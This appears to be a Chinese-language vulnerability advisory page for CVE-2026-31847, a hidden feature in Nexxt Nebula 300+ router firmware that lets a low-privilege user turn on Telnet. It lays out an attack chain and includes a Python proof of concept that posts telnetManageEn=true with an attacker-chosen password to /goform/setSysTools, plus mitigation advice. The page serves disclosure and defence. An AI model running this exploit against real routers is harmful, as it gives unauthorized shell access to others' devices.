IPBUF安全漏洞报告
English
CVE-2026-31847 CVSS 8.8 高危

CVE-2026-31847 Nexxt Nebula 300+ 远程Telnet启用漏洞

披露日期: 2026-03-23
来源: 309f9ea4-e3e9-4c6c-b79d-e8eb01244f2c

漏洞信息

漏洞编号
CVE-2026-31847
漏洞类型
隐藏功能利用
CVSS评分
8.8 高危
攻击向量
网络 (AV:N)
认证要求
低权限 (PR:L)
用户交互
无需交互 (UI:N)
影响产品
Nexxt Solutions Nebula 300+ 固件

相关标签

CVE-2026-31847IoT路由器隐藏功能Telnet远程代码执行Nexxt Solutions

漏洞概述

Nexxt Nebula 300+ 固件存在隐藏功能漏洞,攻击者可利用/goform/setSysTools接口通过特制POST请求远程启用Telnet服务,从而获取系统底层访问权限。

技术细节

该漏洞源于Nexxt Solutions Nebula 300+ 固件中/goform/setSysTools端点的隐藏功能。攻击者首先需要拥有低权限账户凭证,随后向目标设备发送包含telnetManageEn=true及telnetPwd参数的POST请求。设备在处理该请求时会错误地配置系统,在TCP 23端口启动Telnet服务。由于该服务暴露了特权诊断接口,攻击者可借此绕过正常的安全限制,直接与底层操作系统交互,执行任意命令或窃取敏感数据。

攻击链分析

STEP 1
侦察
识别网络中存在的Nexxt Nebula 300+设备,并确认其固件版本是否为12.01.01.37或更低。
STEP 2
认证
利用获取的合法凭证(低权限账户)登录设备管理界面,获取会话Cookie或Token。
STEP 3
漏洞利用
向/goform/setSysTools端点发送特制的POST请求,携带telnetManageEn=true和telnetPwd参数。
STEP 4
建立连接
设备开启23端口Telnet服务,攻击者使用设定的密码连接,获取系统Shell权限。

PoC / 利用代码

⚠️ 仅供安全研究
以下代码仅用于安全研究和授权测试,未经授权使用属于违法行为。
PoC
import requests # Target configuration target_ip = "192.168.1.1" url = f"http://{target_ip}/goform/setSysTools" username = "admin" password = "admin" # Replace with valid credentials # Attacker defined telnet password telnet_password = "hacked" # Payload to enable telnet payload = { "telnetManageEn": "true", "telnetPwd": telnet_password } # Create session to handle authentication (PR:L) session = requests.Session() login_data = {"username": username, "password": password} # Attempt login (Generic login endpoint, adjust based on actual firmware) # session.post(f"http://{target_ip}/login", data=login_data) # Send exploit request headers = {"Content-Type": "application/x-www-form-urlencoded"} response = session.post(url, data=payload, headers=headers) if response.status_code == 200: print("[+] Telnet service enabled successfully.") print(f"[+] Connect via: telnet {target_ip}") else: print("[-] Failed to enable telnet.")

影响范围

Nexxt Solutions Nebula 300+ 固件 <= 12.01.01.37

防御指南

临时缓解措施
建议立即升级设备固件至修复该漏洞的最新版本。如果暂时无法升级,应通过访问控制列表(ACL)严格限制管理后台的来源IP地址,并在网络防火墙上阻断TCP 23端口的入站和出站连接,以防止Telnet服务被滥用。

参考链接

法律声明

以上信息仅供安全研究和授权渗透测试使用。未经授权对他人系统进行测试属于违法行为。利用本报告内容进行非法活动者,后果自负。

快速导航: 前沿安全 最新收录域名列表 最新威胁情报列表 最新网站排名列表 最新工具资源列表 最新CVE漏洞列表